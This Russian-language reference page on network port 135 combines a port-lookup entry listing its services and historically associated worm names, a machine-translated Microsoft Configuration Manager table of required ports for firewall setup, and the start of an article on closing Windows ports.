135 порт tcp: Порт 135 (tcp/udp) - Поиск TCP UDP Портов Online

Содержание

Порт 135 (tcp/udp) — Поиск TCP UDP Портов Online

Номер или имя порта:

Введите номер порта (к примеру, 21), службу (к примеру, ssh, ftp) или угрозу (к примеру, nimda)

База данных обновлена 30 марта 2016 г.

Результаты поиска «135»

Порт: 135/TCP

Сервис
Детали
Источник
DCE endpoint resolution (Official)
WIKI
epmap
DCE endpoint resolution
IANA
Microsoft EPMAP (End Point Mapper), also known as DCE/RPC Locator service, used to remotely manage services including DHCP server, DNS server and WINS. Also used by DCOM (Unofficial)
WIKI
loc-srv
NCS local location broker
SANS
threat
[threat] Secefa
Bekkoame
threat
[threat] W32.Kiman
Bekkoame
threat
[threat] Femot
Bekkoame
threat
[threat] W32. Blaster.Worm
Bekkoame
threat
[threat] W32.Francette.Worm
Bekkoame
threat
[threat] W32.Explet
Bekkoame
threat
[threat] W32.Kibuv.Worm
Bekkoame
threat
[threat] W32.Lovgate
Bekkoame
threat
[threat] W32.Maslan
Bekkoame
threat
[threat] W32.Mytob
Bekkoame
threat
[threat] W32.Reatle
Bekkoame
threat
[threat] W32.Spybot
Bekkoame
threat
[threat] W32.Welchia
Bekkoame
threat
[threat] W32.Yaha
Bekkoame
threat
[threat] W32.Cissi
Bekkoame
threat
[threat] W32.HLLW.Gaobot
Bekkoame
threat
[threat] W32.HLLW.Polybot
Bekkoame
threat
[threat] W32.Kassbot
Bekkoame

Порт: 135/UDP

Сервис
Детали
Источник

epmap
DCE endpoint resolution
IANA
Microsoft EPMAP (End Point Mapper), also known as DCE/RPC Locator service, used to remotely manage services including DHCP server, DNS server and WINS. Also used by DCOM (Unofficial)
WIKI
DCE endpoint resolution (Official)
WIKI
loc-srv
Location Service
SANS
threat
[threat] W32.Blaster.Worm
Bekkoame
threat
[threat] W32.Cissi
Bekkoame
threat
[threat] W32.Explet
Bekkoame
threat
[threat] W32.Francette.Worm
Bekkoame
threat
[threat] W32.HLLW.Gaobot
Bekkoame
threat
[threat] W32.HLLW.Polybot
Bekkoame
threat
[threat] W32.Kassbot
Bekkoame
threat

[threat] W32.Kibuv.Worm
Bekkoame
threat
[threat] W32.Lovgate
Bekkoame
threat
[threat] W32.Maslan
Bekkoame
threat
[threat] W32.Mytob
Bekkoame
threat
[threat] W32.Reatle
Bekkoame
threat
[threat] W32. Spybot
Bekkoame
threat
[threat] W32.Welchia
Bekkoame
threat
[threat] W32.Yaha
Bekkoame
threat
[threat] Femot
Bekkoame

О TCP/UDP-портах

TCP-порт 135 использует протокол управления передачей данных (TCP), который является одним из основных протоколов в сетях TCP/IP. TCP является протоколом с установлением соединения и требует квитирования для установки сквозной связи. Только после установления соединения пользовательские данные могут пересылаться в обоих направлениях.

Внимание! TCP гарантирует доставку пакетов данных через порт 135 в том же порядке, в котором они были отправлены. Гарантированная связь через TCP-порт 135 является основным отличием TCP от UDP.

Предоставляемые через UDP-порт 135 UDP услуги не отличаются надежностью, так как датаграммы могут быть получены в сдублированном виде, с нарушенной очередностью или даже могут пропасть без какого-либо предупреждения. UDP на порт 135 проверка и исправление ошибок не являются обязательными или должны выполняться в прикладной программе, что позволяет избежать накладных расходов на такую обработку на уровне сетевого интерфейса.
UDP (User Datagram Protocol) является минимальным ориентированным на работу с сообщениями протоколом транспортного уровня (протокол описан в IETF RFC 768). Примеры прикладных программ, часто использующих UDP: передача голоса по IP-протоколу (VoIP), передача мультимедийных потоков и многопользовательские игры в режиме реального времени. Множество веб-приложений используют UDP, к примеру, система доменных имен (DNS), информационный протокол маршрутизации (RIP), протокол динамической конфигурации хостов (DHCP), простой протокол управления сетью (SNMP).

TCP против UDP – TCP: надежный, упорядоченный, тяжеловесный, потоковый; UDP – ненадежный, неупорядоченный, легковесный, датаграммы.

Ваш IP-адрес

161.97.168.212

Порты, используемые для подключений — Configuration Manager

Статья
10/05/2022
Чтение занимает 19 мин

Относится к Configuration Manager (Current Branch)

В этой статье перечислены сетевые порты, Configuration Manager используются. Некоторые подключения используют порты, которые нельзя настроить, а некоторые поддерживают настраиваемые порты, которые вы указываете. Если вы используете любую технологию фильтрации портов, убедитесь, что необходимые порты доступны. К таким технологиям фильтрации портов относятся брандмауэры, маршрутизаторы, прокси-серверы или IPsec.

Примечание

Если вы поддерживаете интернет-клиенты с помощью мостов SSL, помимо требований к портам, вам также может потребоваться разрешить некоторым http-командам и заголовкам проходить через брандмауэр.

Порты, которые можно настроить

Configuration Manager позволяет настроить порты для следующих типов взаимодействия:

Прокси-точка регистрации до точки регистрации
Клиентские системы типа «сеть — сеть», в которых выполняются службы IIS
Подключение клиента к Интернету (в качестве параметров прокси-сервера)
Точка обновления программного обеспечения в Интернете (в качестве параметров прокси-сервера)
Точка обновления программного обеспечения на сервере WSUS
От сервера сайта к серверу базы данных сайта
Подключение сервера сайта к серверу базы данных WSUS
Точки служб отчетов
Примечание
Вы настраиваете порты для точки служб отчетов в SQL Server Reporting Services. Configuration Manager затем использует эти порты во время обмена данными с точкой служб отчетов. Обязательно просмотрите эти порты, которые определяют сведения о фильтре IP-адресов для политик IPsec или для настройки брандмауэров.

По умолчанию http-порт, используемый для обмена данными между клиентом и сетью, — это порт 80 и 443 для HTTPS. Эти порты можно изменить во время установки или в свойствах сайта.

Ненастроимые порты

Configuration Manager не позволяет настраивать порты для следующих типов взаимодействия:

Подключение типа «сеть — сеть»
Подключение сервера сайта к системе сайта
Configuration Manager консоли к поставщику SMS
Configuration Manager из консоли в Интернет
Подключения к облачным службам, таким как Microsoft Azure

Порты, используемые клиентами и системами сайта

В следующих разделах подробно описаны порты, используемые для обмена данными в Configuration Manager. Стрелки в заголовке раздела показывают направление взаимодействия:

--> Указывает, что один компьютер начинает взаимодействие, а другой всегда отвечает
<--> Указывает, что любой из компьютеров может начать обмен данными

Точка синхронизации аналитики активов (

--> Майкрософт)

Описание	UDP	TCP
HTTPS	—	443

Точка синхронизации аналитики активов SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Клиентский

--> клиент

Прокси-сервер пробуждения также использует сообщения запроса проверки связи ICMP от одного клиента к другому клиенту. Клиенты используют это взаимодействие, чтобы убедиться, что другой клиент находится в сети. ICMP иногда называют командами проверки связи. ICMP не имеет номера протокола UDP или TCP, поэтому он не указан в таблице ниже. Однако все брандмауэры на основе узла на этих клиентских компьютерах или промежуточных сетевых устройствах в подсети должны разрешать трафик ICMP для успешного взаимодействия прокси-сервера пробуждения.

Описание	UDP	TCP
Пробуждение по локальной сети	9 ^{Примечание 2. Доступен альтернативный порт}	—
Прокси-сервер пробуждения	25536 ^{Примечание 2. Доступны альтернативный порт}	—
Трансляция однорангового кэша Windows PE	8004	—
Скачивание однорангового кэша Windows PE	—	8003

Дополнительные сведения см. в статье о одноранговом кэше Windows PE.

Модуль

--> политики Configuration Manager службы регистрации сетевых устройств (NDES)

Описание	UDP	TCP
HTTP		80
HTTPS	—	443

Клиентская

--> облачная точка распространения

Описание	UDP	TCP
HTTPS	—	443

Дополнительные сведения см. в разделе «Порты и поток данных».

Шлюз управления

--> облачными клиентами (CMG)

Описание	UDP	TCP
HTTPS	—	443

Дополнительные сведения см. в статье о потоке данных CMG.

Клиентская

--> точка распространения как стандартная, так и опрашиваемая

Описание	UDP	TCP
HTTP	—	80 ^{Примечание 2. Доступный альтернативный порт}
HTTPS	—	443 ^{Примечание 2. Доступный альтернативный порт}
Экспресс-обновления	—	8005 ^{Примечание 2. Доступны альтернативный порт}

Примечание

Используйте параметры клиента, чтобы настроить альтернативный порт для экспресс-обновлений. Дополнительные сведения см. в разделе «Порт», используемый клиентами для получения запросов на разностное содержимое.

Клиентская

--> точка распространения, настроенная для многоадресной рассылки, как стандартная, так и опрашиваемая

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Протокол многоадресной рассылки	63000-64000	—

Клиентская

--> точка распространения, настроенная для PXE, как стандартная, так и опрашиваемая

Описание	UDP	TCP
DHCP	67 и 68	—
TFTP	69 ^{Примечание 4}	—
Уровень согласования сведений о загрузке (BINL)	4011	—
DHCPv6 для отвечающего устройства PXE без WDS	547	—

Важно!

При включении брандмауэра на основе узла убедитесь, что правила позволяют серверу отправлять и получать данные через эти порты. При включении точки распространения для PXE Configuration Manager включить правила входящего трафика (получения) в брандмауэре Windows. Правила для исходящего трафика (отправки) не настраиваются.

Резервная

--> точка состояния клиента

Описание	UDP	TCP
HTTP	—	80 ^{Примечание 2. Доступный альтернативный порт}

Контроллер домена

--> глобального каталога клиента

Клиент Configuration Manager не обращается к серверу глобального каталога, если он является компьютером рабочей группы или настроен для обмена данными только через Интернет.

Описание	UDP	TCP
Глобальный каталог LDAP	—	3268

Точка управления

--> клиентами

Описание	UDP	TCP
Уведомление клиента (взаимодействие по умолчанию перед возвратом к HTTP или HTTPS)	—	10123 ^{Примечание 2. Доступны альтернативный порт}
HTTP	—	80 ^{Примечание 2. Доступный альтернативный порт}
HTTPS	—	443 ^{Примечание 2. Доступный альтернативный порт}

Точка обновления

--> клиентского программного обеспечения

Описание	UDP	TCP
HTTP	—	80 или 8530 ^{Примечание 3}
HTTPS	—	443 или 8531 ^{Примечание 3}

Точка миграции

--> состояния клиента

Описание	UDP	TCP
HTTP	—	80 ^{Примечание 2. Доступный альтернативный порт}
HTTPS	—	443 ^{Примечание 2. Доступный альтернативный порт}
Серверный блок сообщений (SMB)	—	445

Масштабируемый набор шлюза

--> управления облачными клиентами для точки подключения шлюза управления облачными клиентами

Configuration Manager использует эти подключения для создания канала CMG. Дополнительные сведения см. в статье о потоке данных CMG.

Описание	UDP	TCP
HTTPS (одна виртуальная машина)	—	443
HTTPS (две или более виртуальных машин)	—	10124-10139

Классическая облачная

--> служба CMG для точки подключения шлюза управления облачными клиентами

Описание	UDP	TCP
TCP-TLS (предпочтительно)	—	10140-10155
HTTPS (резервное копирование с одной виртуальной машиной)	—	443
HTTPS (откат с двумя или более виртуальными машинами)	—	10124-10139

Точка управления точкой подключения

--> ШЛЮЗА

Описание	UDP	TCP
HTTPS	—	443
HTTP	—	80

Требуемый порт зависит от конфигурации точки управления. Дополнительные сведения см. в статье о потоке данных CMG.

Точка подключения шлюза управления облачными клиентами — точка

--> обновления программного обеспечения

Конкретный порт зависит от конфигурации точки обновления программного обеспечения.

Описание	UDP	TCP
HTTPS	—	443/8531
HTTP	—	80/8530

Дополнительные сведения см. в статье о потоке данных CMG.

Configuration Manager консоли

--> Клиента

Описание	UDP	TCP
Удаленное управление (управление)	—	2701
Удаленная помощь (RDP и RTC)	—	3389

Configuration Manager консоли

--> Интернета

Описание	UDP	TCP
HTTP	—	80
HTTPS	—	443

Консоль Configuration Manager использует доступ к Интернету для следующих действий:

Скачивание обновлений программного обеспечения из Центра обновления Майкрософт для пакетов развертывания.
Элемент отзывов на ленте.
Ссылки на документацию в консоли.
Скачивание элементов из Центра сообщества

Configuration Manager консоли

--> Точка служб отчетов

Описание	UDP	TCP
HTTP	—	80 ^{Примечание 2. Доступный альтернативный порт}
HTTPS	—	443 ^{Примечание 2. Доступный альтернативный порт}

Configuration Manager консоли

--> Сервер сайта

Описание	UDP	TCP
RPC (начальное подключение к WMI для поиска системы поставщика)	—	135

Configuration Manager консоли

--> Поставщик SMS

Описание	UDP	TCP
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}
HTTPS	—	443 ^{*Примечание}

Примечание для службы администрирования

Любое устройство, которое вызывает службу администрирования поставщика SMS, использует порт HTTPS 443. Дополнительные сведения см. в разделе «Что такое служба администрирования»?

Configuration Manager политики службы регистрации сетевых устройств (NDES)

--> Точка регистрации сертификата

Описание	UDP	TCP
HTTPS	—	443 ^{Примечание 2. Доступный альтернативный порт}

Точка обслуживания хранилища данных SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Точка распространения, стандартная и точка управления по

--> запросу

Точка распространения взаимодействует с точкой управления в следующих сценариях:

Отчет о состоянии предварительно подготовленного содержимого
Создание сводных данных об использовании
Отчет о проверке содержимого
Чтобы сообщить о состоянии загрузки пакетов, только для точек распространения по запросу

Описание	UDP	TCP
HTTP	—	80 ^{Примечание 2. Доступный альтернативный порт}
HTTPS	—	443 ^{Примечание 2. Доступный альтернативный порт}

Точка Endpoint Protection в

--> Интернете

Описание	UDP	TCP
HTTP	—	80

Точка Endpoint Protection SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Точка регистрации прокси-точки

--> регистрации

Описание	UDP	TCP
HTTPS	—	443 ^{Примечание 2. Доступный альтернативный порт}

Точка регистрации SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Exchange Server соединителя Exchange Online

-->

Описание	UDP	TCP
Удаленное управление Windows по протоколу HTTPS	—	5986

Exchange Server соединителя

--> Локальные Exchange Server

Описание	UDP	TCP
Удаленное управление Windows по протоколу HTTP	—	5985

Прокси-точка

--> регистрации компьютера Mac

Описание	UDP	TCP
HTTPS	—	443

Контроллер домена точки

--> управления

Описание	UDP	TCP
Протокол LDAP	389	389
Безопасный протокол LDAP (LDAPS, для подписывания и привязки)	636	636
Глобальный каталог LDAP	—	3268
Сопоставитель конечных точек RPC	—	135
RPC	—	^{Динамическое примечание 6}

Сервер сайта точки

<--> управления

^{Примечание 5}

Описание	UDP	TCP
Сопоставитель конечных точек RPC	—	135
RPC	—	^{Динамическое примечание 6}
Серверный блок сообщений (SMB)	—	445

Точка управления SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Прокси-точка

--> регистрации мобильных устройств

Описание	UDP	TCP
HTTPS	—	443

Pull-Distribution точка распространения

--> , настроенная в качестве источника

Описание	UDP	TCP
HTTP	—	80 ^{Примечание 2. Доступный альтернативный порт}
HTTPS	—	443 ^{Примечание 2. Доступный альтернативный порт}
Экспресс-обновления	—	8005 ^{Примечание 2. Доступны альтернативный порт}

Reporting Services точки SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Точка подключения службы

--> Azure (CMG)

Описание	UDP	TCP
HTTPS для развертывания службы CMG	—	443

Дополнительные сведения см. в статье о потоке данных CMG.

Точка подключения службы

--> Azure Logic App

Описание	UDP	TCP
HTTPS для внешнего уведомления	—	443

Дополнительные сведения см. в разделе «Внешние уведомления».

Точка синхронизации аналитики

<--> активов сервера сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Клиент сервера

--> сайта

Описание	UDP	TCP
Пробуждение по локальной сети	9 ^{Примечание 2. Доступен альтернативный порт}	—

Облачная точка распространения

--> сервера сайта

Описание	UDP	TCP
HTTPS	—	443

Дополнительные сведения см. в разделе «Порты и поток данных».

Точка распространения сервера

--> сайта как стандартная, так и опрашиваемая

^{Примечание 5}

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Контроллер домена сервера

--> сайта

Описание	UDP	TCP
Протокол LDAP	389	389
Безопасный протокол LDAP (LDAPS, для подписывания и привязки)	636	636
Глобальный каталог LDAP	—	3268
Сопоставитель конечных точек RPC	—	135
RPC	—	^{Динамическое примечание 6}

Точка регистрации сертификата

<--> сервера сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Точка подключения шлюза

<--> управления облачными клиентами сервера сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Точка Endpoint Protection сервера

<--> сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Точка регистрации сервера

<--> сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Прокси-точка

<--> регистрации сервера сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Резервная точка

<--> состояния сервера сайта

^{Примечание 5}

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Интернет-сервер

--> сайта

Описание	UDP	TCP
HTTP	—	80 ^{Примечание 1}
HTTPS	—	443

Сервер сайта,

<--> выдав центр сертификации (ЦС)

Это взаимодействие используется при развертывании профилей сертификатов с помощью точки регистрации сертификатов. Обмен данными используется не для каждого сервера сайта в иерархии. Вместо этого он используется только для сервера сайта в верхней части иерархии.

Описание	UDP	TCP
Сопоставитель конечных точек RPC	135	135
RPC (DCOM)	—	^{Динамическое примечание 6}

Сервер сайта,

--> на котором размещен общий ресурс удаленной библиотеки содержимого

Библиотеку содержимого можно переместить в другое место хранения, чтобы освободить место на жестком диске на серверах центра администрирования или первичного сайта. Дополнительные сведения см. в разделе «Настройка удаленной библиотеки содержимого для сервера сайта».

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445

Точка подключения службы

<--> сервера сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Точка служб отчетов

<--> сервера сайта

^{Примечание 5}

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Сервер сайта сервера

<--> сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445

Сервер сайта SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Во время установки сайта, использующего удаленный SQL Server для размещения базы данных сайта, откройте следующие порты между сервером сайта и сервером SQL Server:

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Сервер сайта SQL Server

--> для WSUS

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 3. Доступны альтернативные порты}

Поставщик SMS сервера

--> сайта

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}

Точка обновления программного

<--> обеспечения сервера сайта

^{Примечание 5}

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	^{Динамическое примечание 6}
HTTP	—	80 или 8530 ^{Примечание 3}
HTTPS	—	443 или 8531 ^{Примечание 3}

Точка миграции состояния

<--> сервера сайта

^{Примечание 5}

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445
Сопоставитель конечных точек RPC	135	135

Поставщик SMS SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Точка обновления программного обеспечения в

--> Интернете

Описание	UDP	TCP
HTTP	—	80 ^{Примечание 1}

Вышестоящий сервер

--> WSUS точки обновления программного обеспечения

Описание	UDP	TCP
HTTP	—	80 или 8530 ^{Примечание 3}
HTTPS	—	443 или 8531 ^{Примечание 3}

--> SQL Server SQL Server

Межсайтовая репликация базы данных требует, чтобы SQL Server одном сайте напрямую взаимодействовал с SQL Server на родительском или дочернем сайте.

Описание	UDP	TCP
Служба SQL Server	—	1433 ^{Примечание 2. Доступны альтернативный порт}
SQL Server Service Broker	—	4022 ^{Примечание 2 . Доступен альтернативный порт}

Совет

Configuration Manager не требует браузера SQL Server, который использует порт UDP 1434.

Точка миграции состояния SQL Server

-->

Описание	UDP	TCP
SQL по TCP	—	1433 ^{Примечание 2. Доступны альтернативный порт}

Заметки о портах, используемых клиентами и системами сайта

Примечание 1. Порт прокси-сервера

Этот порт нельзя настроить, но его можно перенаправить через настроенный прокси-сервер.

Примечание 2. Доступен альтернативный порт

Вы можете определить альтернативный порт в Configuration Manager для этого значения. Если вы определяете пользовательский порт, используйте его в сведениях о фильтре IP-адресов для политик IPsec или для настройки брандмауэров.

Примечание 3. Windows Server Update Services (WSUS)

Так Windows Server 2012, по умолчанию WSUS использует порт 8530 для HTTP и порт 8531 для HTTPS.

После установки можно изменить порт. Вам не нужно использовать один и тот же номер порта в иерархии сайта.

Если http-порт имеет значение 80, httpS-порт должен иметь значение 443.
Если http-порт — это что-то другое, порт HTTPS должен быть 1 или выше, например 8530 и 8531.
Примечание
При настройке точки обновления программного обеспечения для использования ПРОТОКОЛА HTTP-порт также должен быть открыт. Незашифрованные данные, такие как лицензионное соглашение для определенных обновлений, используют порт HTTP.
Сервер сайта устанавливает подключение к серверу SQL Server, где размещается база данных SUSDB, при включении следующих параметров очистки WSUS:
- Добавление некластеризованных индексов в базу данных WSUS для повышения производительности очистки WSUS
- Удаление устаревших обновлений из базы данных WSUS

Если вы измените порт SQL Server по умолчанию на альтернативный порт с диспетчер конфигурации SQL Server, убедитесь, что сервер сайта может подключиться с помощью определенного порта. Configuration Manager не поддерживает динамические порты. По умолчанию SQL Server именованные экземпляры используют динамические порты для подключений к ядру СУБД. При использовании именованного экземпляра вручную настройте статический порт.

Примечание 4. Управляющая программа TFTP

Системная служба управляющей программы TFTP (TFTP) не требует имени пользователя или пароля и является неотъемлемой частью служб развертывания Windows (WDS). Тривиальная служба управляющей программы FTP реализует поддержку протокола TFTP, определенного следующими RFC:

RFC 1350: TFTP
RFC 2347: расширение option
RFC 2348: параметр размера блока
RFC 2349: интервал времени ожидания и параметры размера передачи

TFTP предназначен для поддержки сред загрузки без дисков. Управляющие программы TFTP прослушивают UDP-порт 69, но отвечают с динамически выделенного высокого порта. Если этот порт включен, служба TFTP может получать входящие запросы TFTP, но выбранный сервер не может отвечать на эти запросы. Вы не можете разрешить выбранному серверу отвечать на входящие запросы TFTP, если только не настроите TFTP-сервер для ответа с порта 69.

Точка распространения с поддержкой PXE и клиент в Среде предустановки Windows выбирают динамически выделенные высокие порты для передачи TFTP. Эти порты определены корпорацией Майкрософт в период с 49152 по 65535. Дополнительные сведения см. в обзоре службы и требованиях к сетевым портам для Windows.

Однако во время фактической загрузки PXE сетевая карта на устройстве выбирает динамически выделенный высокий порт, используемый во время передачи TFTP. Сетевая карта на устройстве не привязана к динамически выделенным высоким портам, определенным корпорацией Майкрософт. Он привязан только к портам, определенным в RFC 1350. Этот порт может быть любым от 0 до 65535. Чтобы получить дополнительные сведения о динамически выделенных высоких портах, используемых сетевой картой, обратитесь к изготовителю оборудования устройства.

Примечание 5. Обмен данными между сервером сайта и системами сайта

По умолчанию обмен данными между сервером сайта и системами сайта выполняется двунаправленно. Сервер сайта начинает обмен данными для настройки системы сайта, а затем большинство систем сайта подключаются к серверу сайта для отправки сведений о состоянии. Точки службы отчетов и точки распространения не отправляют сведения о состоянии. Если выбрать «Требовать от сервера сайта инициировать подключения к этой системе сайта в свойствах системы сайта после установки системы сайта», система сайта не начнет взаимодействие с сервером сайта. Вместо этого сервер сайта начинает обмен данными. Он использует учетную запись установки системы сайта для проверки подлинности на сервере системы сайта.

Примечание 6. Динамические порты

Динамические порты используют диапазон номеров портов, определенный версией ОС. Эти порты также называются временными портами. Дополнительные сведения о диапазонах портов по умолчанию см. в обзоре службы и требованиях к сетевым портам для Windows.

Другие порты

В следующих разделах содержатся дополнительные сведения о портах, Configuration Manager используются.

Общие папки между клиентами и серверами

Клиенты используют блок сообщений сервера (SMB) при каждом подключении к общим папкам UNC. Например:

Установка клиента вручную, указывающее CCMSetup.exe /source: командной строки
Клиенты Endpoint Protection, скачиваемые файлы определений по UNC-пути

Описание	UDP	TCP
Серверный блок сообщений (SMB)	—	445

Подключения к SQL Server

Для связи с ядром SQL SERVER и межсайтовой репликации можно использовать порт SQL Server по умолчанию или указать пользовательские порты:

Использование межсайтовых коммуникаций:
- SQL Server Service Broker, который по умолчанию портирует TCP 4022.
- SQL Server, которая по умолчанию портирует TCP 1433.
Для внутрисайтового обмена данными между ядром СУБД SQL Server и различными Configuration Manager систем сайта по умолчанию используется порт TCP 1433.
Configuration Manager использует те же порты и протоколы для взаимодействия с каждой репликой группы доступности SQL Server Always On, на которой размещена база данных сайта, как если бы реплика была автономным SQL Server экземпляром.

Если вы используете Azure, а база данных сайта находится за внутренней или внешней подсистемой балансировки нагрузки, настройте следующие компоненты:

Исключения брандмауэра для каждой реплики
Правила балансировки нагрузки

Настройте следующие порты:

SQL через TCP: TCP 1433
SQL Server Service Broker: TCP 4022
Серверный блок сообщений (SMB): TCP 445
Сопоставитель конечных точек RPC: TCP 135

Предупреждение

Configuration Manager не поддерживает динамические порты. По умолчанию SQL Server именованные экземпляры используют динамические порты для подключений к ядру СУБД. При использовании именованного экземпляра вручную настройте статический порт для внутрисайтового обмена данными.

Следующие роли системы сайта взаимодействуют непосредственно с SQL Server базы данных:

Роль точки регистрации сертификатов
Роль точки регистрации
Точка управления
Сервер сайта
Reporting Services точке
Поставщик SMS
--> SQL Server SQL Server

Если в SQL Server размещена база данных из нескольких сайтов, каждая база данных должна использовать отдельный экземпляр SQL Server. Настройте каждый экземпляр с уникальным набором портов.

Если вы включите брандмауэр на основе узла на SQL Server, настройте его, чтобы разрешить правильные порты. Также настройте сетевые брандмауэры между компьютерами, которые взаимодействуют с SQL Server.

Пример настройки SQL Server для использования определенного порта см. в разделе «Настройка сервера для прослушивания определенного TCP-порта».

Обнаружение и публикация

Configuration Manager использует следующие порты для обнаружения и публикации сведений о сайте:

Протокол доступа к упрощенным каталогам (LDAP): 389
Secure LDAP (LDAPS, for signing and binding): 636
Глобальный LDAP каталога: 3268
RPC Endpoint Mapper: 135
RPC: динамически выделенные высокодоступные TCP-порты
TCP: 1024: 5000
TCP: 49152: 65535

Внешние подключения, созданные Configuration Manager

Локальные клиенты Configuration Manager или системы сайта могут выполнять следующие внешние подключения:

Точка синхронизации аналитики активов ( --> Майкрософт)
Точка Endpoint Protection в --> Интернете
Контроллер домена --> глобального каталога клиента
Configuration Manager консоли --> Интернета
Контроллер домена точки --> управления
Контроллер домена сервера --> сайта
Сервер сайта, <--> выдавляющего центр сертификации (ЦС)
Точка обновления программного обеспечения в --> Интернете
Вышестоящий сервер --> WSUS точки обновления программного обеспечения
Точка подключения службы --> Azure
Точка подключения службы --> Azure Logic App
Облачная служба CMG для --> точки подключения шлюза управления облачными клиентами

Требования к установке систем сайта, поддерживающих интернет-клиенты

Примечание

Этот раздел относится только к управлению клиентами через Интернет (IBCM). Он не применяется к шлюзу управления облачными клиентами. Дополнительные сведения см. в разделе «Управление клиентами в Интернете».

Интернет-точки управления, точки распространения, поддерживающие интернет-клиенты, точка обновления программного обеспечения и резервная точка состояния используют следующие порты для установки и восстановления:

Система сайта сервера --> сайта: сопоставитель конечных точек RPC с использованием UDP и TCP-порта 135
Система сайта сервера --> сайта: динамические TCP-порты RPC
Система сайта сервера <--> сайта: блоки сообщений сервера (SMB) с использованием TCP-порта 445

Для установки приложений и пакетов в точках распространения требуются следующие порты RPC:

Используйте протокол IPsec для защиты трафика между сервером сайта и системами сайта. Если необходимо ограничить динамические порты, используемые с RPC, можно использовать средство настройки Microsoft RPC (rpccfg. exe). Используйте это средство для настройки ограниченного диапазона портов для этих пакетов RPC. Дополнительные сведения см. в статье о настройке RPC для использования определенных портов и о том, как защитить эти порты с помощью IPsec.

Важно!

Перед установкой этих систем сайта убедитесь, что удаленная служба реестра запущена на сервере системы сайта и что вы указали учетную запись установки системы сайта, если система сайта находится в другом лесу Active Directory без отношения доверия. Например, служба удаленного реестра используется на серверах с системами сайта, такими как точки распространения (опрашиваемые и стандартные) и удаленные серверы SQL Server.

Порты, используемые Configuration Manager установки клиента

Порты, Configuration Manager используются во время установки клиента, зависят от метода развертывания:

Список портов для каждого метода развертывания клиента см. в разделе «Порты» Configuration Manager развертывания клиента.
Дополнительные сведения о настройке брандмауэра Windows на клиенте для установки клиента и обмена данными после установки см. в разделе «Параметры брандмауэра и порта Windows для клиентов».

Порты, используемые при миграции

Сервер сайта, на котором выполняется миграция, использует несколько портов для подключения к применимым сайтам в исходной иерархии. Дополнительные сведения см. в разделе «Необходимые конфигурации для миграции».

Порты, используемые Windows Server

В следующей таблице перечислены некоторые ключевые порты, используемые Windows Server.

Описание	UDP	TCP
DNS	53	53
DHCP	67 и 68	—
Разрешение имен NetBIOS	137	—
Служба датаграмм NetBIOS	138	—
Служба сеансов NetBIOS	—	139
Проверка подлинности Kerberos	—	88

Дополнительные сведения см. в следующих статьях:

Обзор служб и требования к сетевым портам в Windows
Настройка брандмауэра для доменов и доверия

Схема

На следующей схеме показаны подключения между основными компонентами, которые находятся на типичном Configuration Manager сайте. В настоящее время он включает не все подключения.

Дальнейшие действия

Поддержка прокси-сервера

Требования к доступу к Интернету

Как закрыть порты Windows. Основы сетевых портов Как закрыть 135 порт

Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.

Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.

Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.

